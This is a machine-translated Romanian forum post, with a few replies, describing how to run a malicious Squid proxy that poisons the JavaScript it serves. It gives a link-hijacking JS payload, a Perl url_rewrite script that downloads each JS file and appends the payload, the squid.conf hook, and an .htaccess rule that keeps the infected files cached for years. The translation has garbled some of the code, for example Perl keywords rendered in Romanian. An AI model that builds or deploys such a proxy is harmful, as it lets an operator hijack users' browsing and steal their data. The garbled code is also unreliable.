Acest articol este un articol oglindă al traducerii automate, vă rugăm să faceți clic aici pentru a sări la articolul original.

Vedere: 14819|Răspunde: 3

[Comunicare sigură] Utilizarea serverelor proxy pentru a prelua datele private ale utilizatorilor

[Copiază linkul]
Postat pe 19.01.2015 02:34:56 | | | |
Această postare a fost editată ultima dată de Mo Xiaowen la 2015-6-7 23:19


Acest lucru se poate realiza prin modificarea configurației SQUID
Ce este SQUID?
Squid este un software care stochează datele de pe Internet, primește cereri de descărcare de la utilizatori și procesează automat datele descărcate. Când un utilizator dorește să descarce o pagină principală, poate trimite o cerere către Squid, să-i ceară să o descarce în numele său, apoi Squid se conectează la site și solicită pagina principală, iar apoi trimite pagina principală utilizatorului păstrând un backup, iar când alți utilizatori aplică pentru aceeași pagină, Squid trimite imediat backup-ul salvat către utilizator, astfel încât utilizatorul să simtă că viteza este destul de mare. Squid poate face proxy protocoale precum HTTP, FTP, GOPHER, SSL și WAIS, iar Squid poate gestiona automat, iar tu poți configura Squid după nevoile tale pentru a filtra lucrurile nedorite.
Squid poate funcționa în multe sisteme de operare, precum AIX, Digital, UNIX, FreeBSD, HP-UX, Irix, Linux, NetBSD, Nextstep, SCO, Solaris, OS/2 etc.
Implementarea este foarte simplă:
1. Instalează Squid pe un server Linux.
2. Modificăm codul serverului, inserăm o bucată din codul nostru în tot javascrip-ul transmis și îl trimitem.
3. Setează timpul de cache al fișierului js modificat cât mai mare posibil.
Această metodă se aplică și site-urilor web cu SSL activat, dacă site-ul încarcă o resursă nesigură (cum ar fi jquery pentru un site HTTP), majoritatea browserelor vor emite un avertisment, dar puțini oameni acordă atenție.
Chema a spus că peste 5.000 de persoane i-au folosit proxy-ul la câteva zile după ce l-a lansat, iar majoritatea l-au folosit pentru a face lucruri rele, pentru că au folosit proxy-ul, așa că au crezut că este anonim și sigur, dar nu s-au așteptat niciodată ca și serverul proxy să facă lucruri rele.
Creează-ți un server proxy malițios
Dacă ai deja un server proxy Squid, vei avea nevoie și de un server web precum Apache.
Pasul 1 Creează o încărcătură utilă
Folosesc un script simplu ca demonstrație pentru a direcționa toate hyperlink-urile către site-ul meu.
/etc/squid/payload.js

[mw_shl_code=javascrip remove t, true]for(var i=0; i<document.getelementsbytagname('a').length; i++)
document.getElementsByTagName('a').href = "https://blog.haschek.at"; [/mw_shl_code]
Pasul 2 Scrie un script care să infecteze toate fișierele JS
/etc/squid/poison.pl
[mw_shl_code=perl,true]
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
în timp ce (<>)
{
  mușcăt $_;
  if($_ =- /(.*.js)/i)
  {
        $url = $1;
        system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
        system("chmod o+r /var/www/tmp/$pid-$count.js");
        system("cat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");
        tipărește "http://127.0.0.1:80/tmp/$pid-$count.js";
  }
  altfel
  {
        tipărește "$_";
  }
$count++;
}[/mw_shl_code]
Acest script folosește wget pentru a obține javascrip-ul original al paginii și a elimina fișierul t, apoi adaugă codul în /etc/squid/payload.js și trimite fișierul modificat către client, în timp ce trebuie să creezi directorul /var/www/tmp și să permiți squid să scrie fișiere în el. Acest director stochează fișierele js modificate.


Pasul 3 Combină scenariul de mai sus cu Squid
Adaugă-l în /etc/squid/squid.conf
[mw_shl_code=html,true]url_rewrite_program /etc/squid/poison.pl[/mw_shl_code]
Pasul 4 Fă ca cache-ul să nu dea niciodată greș
/var/www/tmp/.htaccess
[mw_shl_code=html,true] Expiră Activ pe
ExpirăImplicit "acces plus 3000 de zile"[/mw_shl_code]
Acest lucru îi va spune lui Apache să-i acorde un termen lung de expirare până când utilizatorul își curăță cache-ul.


Dacă conectezi acest proxy, dacă dai click pe orice hyperlink, vei fi redirecționat către site-ul meu, iar cache-ul va rămâne în continuare chiar dacă nu folosești proxy-ul mai târziu. Eu am folosit doar un payload non-agresiv, iar cu această metodă, hackerii pot face mult mai mult. Așadar, amintește-ți ție și prietenilor să fiți precauți când folosiți proxy-uri gratuite.





Precedent:Mii de materiale transparente FLASH
Următor:Mașinile Android trec pe iPhone și iPad în câteva minute (foarte ușor)
Postat pe 19.01.2015 08:48:45 |
Da, toate datele de acces pot fi interceptate de către serverul proxy, inclusiv trimiterile post-get, deci cum poate fi comunicată confidențialitatea?
Postat pe 19.01.2015 09:53:53 |
Pot ei să-mi intercepteze cookie-urile?
 Proprietarul| Postat pe 20.01.2015 14:36:06 |
Wu Soft Inquiry Group Postat la 2015-1-19 09:53
Pot ei să-mi intercepteze cookie-urile?

Da                                             
Disclaimer:
Tot software-ul, materialele de programare sau articolele publicate de Code Farmer Network sunt destinate exclusiv scopurilor de învățare și cercetare; Conținutul de mai sus nu va fi folosit în scopuri comerciale sau ilegale, altfel utilizatorii vor suporta toate consecințele. Informațiile de pe acest site provin de pe Internet, iar disputele privind drepturile de autor nu au legătură cu acest site. Trebuie să ștergi complet conținutul de mai sus de pe calculatorul tău în termen de 24 de ore de la descărcare. Dacă îți place programul, te rugăm să susții software-ul autentic, să cumperi înregistrarea și să primești servicii autentice mai bune. Dacă există vreo încălcare, vă rugăm să ne contactați prin e-mail.

Mail To:help@itsvse.com